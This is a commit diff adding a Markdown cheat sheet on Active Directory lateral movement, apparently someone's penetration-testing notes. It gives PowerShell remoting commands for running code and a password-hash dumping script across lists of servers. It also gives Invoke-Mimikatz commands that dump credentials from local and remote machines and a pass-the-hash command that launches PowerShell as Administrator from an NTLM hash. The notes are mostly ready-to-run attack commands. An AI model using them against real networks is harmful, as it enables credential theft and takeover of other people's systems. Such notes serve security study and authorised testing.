Add files via upload

Active Directory/Lateral Movement/Lateral Movement.md

@@ -0,0 +1,63 @@
+# Lateral Movement - Powershell Remoting
+
+## PSSession
+
+- Interactive
+- Runs in a new process (wsmprovhost)
+- Is stateful (session is tracked)
+
+## Useful cmdlets
+
+```
+New-PSSession -ComputerName computername.domainanme
+Enter-PSSession -ComputerName computername.domainanme
+```
+
+We can use `-Credential` to pass username/password
+
+### To execute commands or scriptblocks
+
+```
+Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
+
+Invoke-Command -Scriptblock {whoami;hostname} -ComputerName computername.domainname
+
+
+```
+
+### To execute scripts from files
+
+```
+Invoke-Command -FilePath C:\path\to\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_server>)
+```
+
+### Execute `Stateful` commands 
+
+```
+$Sess = New-PSSession -ComputerName computername
+
+Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
+
+```
+
+## Mimikatz Powershell
+Powershell script for mimikatz is used for dumping credentials ,tickets without dropping mimikatz exe  to disk . It is used for passing , replaying hashes. Hashes can only be dumped with administrative privilieges 
+
+### Dump credentials on local machine
+
+```
+Invoke-Mimikatz -DumpCreds
+```
+
+### Dump credentials on multiple remote machines 
+
+```
+Invoke-Mimikatz -DumpCreds -ComputerName @("computer1","computer2")
+```
+
+### Generate tokens from hashes
+
+```
+Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:computername.domain.name /ntlm:ntlmhash /run:powershell.exe"'
+```
+